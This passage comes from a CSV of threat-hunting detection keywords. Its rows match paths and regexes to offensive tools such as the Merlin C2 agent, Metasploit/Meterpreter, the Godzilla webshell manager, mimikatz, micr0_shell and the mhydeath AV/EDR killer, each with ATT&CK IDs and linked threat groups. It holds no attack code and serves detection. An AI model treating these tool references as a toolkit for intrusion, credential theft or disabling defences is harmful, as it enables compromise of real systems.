TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","8766" "*/merlin-agent/tarball/v*",".{0,1000}\/merlin\-agent\/tarball\/v.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","8767" "*/merlin-agent/v2/cli*",".{0,1000}\/merlin\-agent\/v2\/cli.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","8768" "*/merlin-agent/v2/core*",".{0,1000}\/merlin\-agent\/v2\/core.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","8769" "*/merlin-agent/zipball/v*",".{0,1000}\/merlin\-agent\/zipball\/v.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","8770" "*/merlin-agent-dll.git*",".{0,1000}\/merlin\-agent\-dll\.git.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","1","N/A","N/A","10","10","51","15","2025-04-17T14:01:36Z","2021-04-17T16:58:24Z","8771" "*/merlin-agent-dll/*",".{0,1000}\/merlin\-agent\-dll\/.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","1","N/A","N/A","10","10","51","15","2025-04-17T14:01:36Z","2021-04-17T16:58:24Z","8772" "*/merlinAgent-Linux-x64*",".{0,1000}\/merlinAgent\-Linux\-x64.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","#linux","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","8773" "*/met_inject.py*",".{0,1000}\/met_inject\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","8780" "*/Metasploit*",".{0,1000}\/Metasploit.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://www.metasploit.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","8781" "*/metasploit.go*",".{0,1000}\/metasploit\.go.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","8782" "*/metasploit/*",".{0,1000}\/metasploit\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","8783" "*/metasploit_payloads.*",".{0,1000}\/metasploit_payloads\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","0","#linux","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","8784" "*/metasploit-coop:*",".{0,1000}\/metasploit\-coop\:.{0,1000}","offensive_tool_keyword","MetasploitCoop","Post-exploitation collaboration platform based on MSF","T1105 - T1098 - T1104 - T1136","TA0010 - TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x727/MetasploitCoop_0x727","1","1","N/A","N/A","10","10","217","38","2021-08-17T15:24:50Z","2021-08-17T10:37:44Z","8785" "*/MetasploitCoop_0x727.git*",".{0,1000}\/MetasploitCoop_0x727\.git.{0,1000}","offensive_tool_keyword","MetasploitCoop","Post-exploitation collaboration platform based on MSF","T1105 - T1098 - T1104 - T1136","TA0010 - TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x727/MetasploitCoop_0x727","1","1","N/A","N/A","10","10","217","38","2021-08-17T15:24:50Z","2021-08-17T10:37:44Z","8786" "*/MetasploitCoop-Backend.git*",".{0,1000}\/MetasploitCoop\-Backend\.git.{0,1000}","offensive_tool_keyword","MetasploitCoop","Post-exploitation collaboration platform based on MSF","T1105 - T1098 - T1104 - T1136","TA0010 - TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x727/MetasploitCoop-Backend","1","1","N/A","N/A","10","10","37","8","2021-08-17T10:26:17Z","2021-08-17T07:52:12Z","8787" "*/MetasploitCoop-Frontend.git*",".{0,1000}\/MetasploitCoop\-Frontend\.git.{0,1000}","offensive_tool_keyword","MetasploitCoop","Post-exploitation collaboration platform based on 
MSF","T1105 - T1098 - T1104 - T1136","TA0010 - TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x727/MetasploitCoop-Frontend","1","1","N/A","N/A","10","10","20","7","2024-04-03T14:49:19Z","2021-08-17T10:36:52Z","8788" "*/metasploit-framework/*",".{0,1000}\/metasploit\-framework\/.{0,1000}","offensive_tool_keyword","MetasploitCoop","Post-exploitation collaboration platform based on MSF","T1105 - T1098 - T1104 - T1136","TA0010 - TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x727/MetasploitCoop-Backend","1","1","N/A","N/A","10","10","37","8","2021-08-17T10:26:17Z","2021-08-17T07:52:12Z","8789" "*/metasploit-framework/embedded/framework*",".{0,1000}\/metasploit\-framework\/embedded\/framework.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","8790" "*/metasploit-info.nse*",".{0,1000}\/metasploit\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8791" "*/metasploit-msgrpc-brute.nse*",".{0,1000}\/metasploit\-msgrpc\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8792" "*/metasploit-omnibus*",".{0,1000}\/metasploit\-omnibus.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","1","N/A","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","8793" "*/metasploit-omnibus.git*",".{0,1000}\/metasploit\-omnibus\.git.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","1","N/A","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","8794" "*/metasploit-omnibus.git*",".{0,1000}\/metasploit\-omnibus\.git.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","1","N/A","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","8795" "*/metasploit-xmlrpc-brute.nse*",".{0,1000}\/metasploit\-xmlrpc\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8796" "*/metatwin.git*",".{0,1000}\/metatwin\.git.{0,1000}","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/threatexpress/metatwin","1","1","N/A","N/A","9","4","345","71","2024-11-19T19:45:59Z","2017-10-08T13:26:00Z","8797" "*/meterpreter*",".{0,1000}\/meterpreter.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","8798" "*/Meterpreter.classs*",".{0,1000}\/Meterpreter\.classs.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","C2","https://github.com/BeichenDream/Godzilla","1","1","N/A","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","8799" "*/meterpreter.php*",".{0,1000}\/meterpreter\.php.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - 
Turla","C2","https://github.com/BeichenDream/Godzilla","1","1","N/A","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","8800" "*/Meterpreter.py*",".{0,1000}\/Meterpreter\.py.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta - FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","Resource Development","https://github.com/sevagas/macro_pack","1","1","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","8801" "*/meterpreter.rc*",".{0,1000}\/meterpreter\.rc.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta - FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","Resource Development","https://github.com/sevagas/macro_pack","1","1","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","8802" "*/meterpreter/reverse_tcp*",".{0,1000}\/meterpreter\/reverse_tcp.{0,1000}","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. 
It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla - Black Basta","C2","https://github.com/chrispetrou/HRShell","1","1","N/A","N/A","10","10","247","70","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z","8803" "*/MFASweep.git*",".{0,1000}\/MFASweep\.git.{0,1000}","offensive_tool_keyword","MFASweep","A tool for checking if MFA is enabled on multiple Microsoft Services","T1595 - T1595.002 - T1078.003 - T1621","TA0006 - TA0009","N/A","N/A","Exploitation tool","https://github.com/dafthack/MFASweep","1","1","N/A","N/A","9","10","1484","203","2025-03-04T20:36:41Z","2020-09-22T16:25:03Z","8804" "*/mhydeath.git*",".{0,1000}\/mhydeath\.git.{0,1000}","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","Black Basta","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","N/A","10","4","397","71","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z","8805" "*/mhydeath.sln*",".{0,1000}\/mhydeath\.sln.{0,1000}","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","Black Basta","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","N/A","10","4","397","71","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z","8806" "*/mhydeath/main.cpp*",".{0,1000}\/mhydeath\/main\.cpp.{0,1000}","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","Black Basta","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","N/A","10","4","397","71","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z","8807" "*/michaelweber/Macrome*",".{0,1000}\/michaelweber\/Macrome.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document 
Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tool","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","N/A","6","520","79","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z","8808" "*/micr0%20shell.py*",".{0,1000}\/micr0\%20shell\.py.{0,1000}","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/senzee1984/micr0_shell","1","1","N/A","N/A","9","2","186","30","2024-07-21T08:16:57Z","2023-08-13T02:46:51Z","8809" "*/micr0_shell.git*",".{0,1000}\/micr0_shell\.git.{0,1000}","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/senzee1984/micr0_shell","1","1","N/A","N/A","9","2","186","30","2024-07-21T08:16:57Z","2023-08-13T02:46:51Z","8810" "*/MicroBurst.git*",".{0,1000}\/MicroBurst\.git.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","Scattered Spider*","Exploitation tool","https://github.com/NetSPI/MicroBurst","1","1","N/A","N/A","6","10","2143","320","2025-03-19T17:07:24Z","2018-07-16T16:47:20Z","8811" "*/mikrotik-routeros-brute.nse*",".{0,1000}\/mikrotik\-routeros\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8814" "*/mimi32.exe*",".{0,1000}\/mimi32\.exe.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","8815" "*/mimi64.exe*",".{0,1000}\/mimi64\.exe.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. 
PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","8816" "*/mimicom.idl*",".{0,1000}\/mimicom\.idl.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","8817" "*/mimidogz.git*",".{0,1000}\/mimidogz\.git.{0,1000}","offensive_tool_keyword","mimidogz","Rewrite of Invoke-Mimikatz.ps1 to avoid AV detection","T1055 - T1560.001 - T1110.001 - T1003 - T1071","TA0005 - TA0040 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/projectb-temp/mimidogz","1","1","N/A","N/A","10","1","0","0","2019-02-11T10:14:10Z","2019-02-11T10:12:08Z","8818" "*/mimidropper.hta*",".{0,1000}\/mimidropper\.hta.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. 
